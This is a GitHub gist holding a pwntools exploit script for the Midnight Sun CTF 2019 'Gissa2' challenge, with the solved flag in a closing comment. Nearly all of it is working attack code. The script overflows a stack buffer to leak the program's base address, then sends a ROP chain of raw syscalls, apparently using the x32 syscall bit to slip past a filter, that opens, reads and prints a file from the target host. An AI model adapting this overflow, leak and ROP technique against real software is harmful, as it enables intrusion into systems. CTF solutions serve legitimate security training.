Skip to content

Instantly share code, notes, and snippets.

@hama7230

hama7230/exp.py

Last active Apr 6, 2019
Embed
What would you like to do?
Midnight Sun CTF 2019 Quals Gissa2
#!/usr/bin/env python
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
#context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('')
elf = ELF('./gissa_igen')
context(os='linux', arch=elf.arch)
context(log_level='debug') # output verbose log
RHOST = "gissa-igen-01.play.midnightsunctf.se"
RPORT = 4096
LHOST = "127.0.0.1"
LPORT = 4096
def section_addr(name, elf=elf):
return elf.get_section_by_name(name).header['sh_addr']
def dbg(ss):
log.info("%s: 0x%x" % (ss, eval(ss)))
conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
if opt in 'rl':
conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
gdbscript = """
continue
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
conn = gdb.debug(['./gissa_igen'], gdbscript=gdbscript)
else:
conn = process(['./gissa_igen'])
# conn = process(['./gissa_igen'], env={'LD_PRELOAD': ''})
if opt == 'a': gdb.attach(conn)
def none_input():
conn.sendlineafter(':', '')
# exploit
log.info('Pwning')
none_input()
payload = 'x'*(0xa8-0x1c) + p16(0xa8) + p16(0x0000) + p64(0xdeaddeaddeaddead) + p64(0x8fffffff44434241)
print hex(len(payload))
conn.sendlineafter(':', payload)
payload = 'x'*(0xa8-0x1c) + p16(0x1010) + p16(0x7ff0) + p64(0xdeaddeaddeaddead) + p64(0x8fffffff44434241) + 'z'*8
conn.sendafter(':', payload)
conn.recvuntil('z'*8)
bin_base = u64(conn.recv(6) + '\x00'*2) - 0xbc5
dbg('bin_base')
'''
0x00000c21: pop rax ; pop rdi ; pop rsi ; ret ; (1 found)
0x00000c1d: pop rdx ; pop r9 ; pop r8 ; pop rdi ; pop rsi ; ret ; (1 found)
0x00000bd9: syscall ; ret ; (11 found)
'''
pop_rax_rdi_rsi = bin_base + 0x00000c21
pop_rdx_pop_4 = bin_base + 0x00000c1d
syscall = bin_base + 0x00000bd9
read_n = bin_base + 0x88B
writable = bin_base + 0x202000
none_input()
rop = ''
rop += p64(pop_rdx_pop_4) + p64(0)*5 + p64(pop_rax_rdi_rsi) + p64(0x40000000+2) + p64(bin_base+0x1585) + p64(0) + p64(syscall)
rop += p64(pop_rdx_pop_4) + p64(0x100)*5 + p64(pop_rax_rdi_rsi) + p64(0) + p64(3) + p64(writable) + p64(syscall)
rop += p64(pop_rdx_pop_4) + p64(0x100)*5 + p64(pop_rax_rdi_rsi) + p64(1) + p64(1) + p64(writable) + p64(syscall) + p64(0xbad)
payload = 'z'*0xa8 + rop
conn.sendlineafter(':', payload)
conn.interactive()
# midnight{I_kN3w_1_5H0ulD_h4v3_jUst_uS3d_l1B5eCC0mP}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.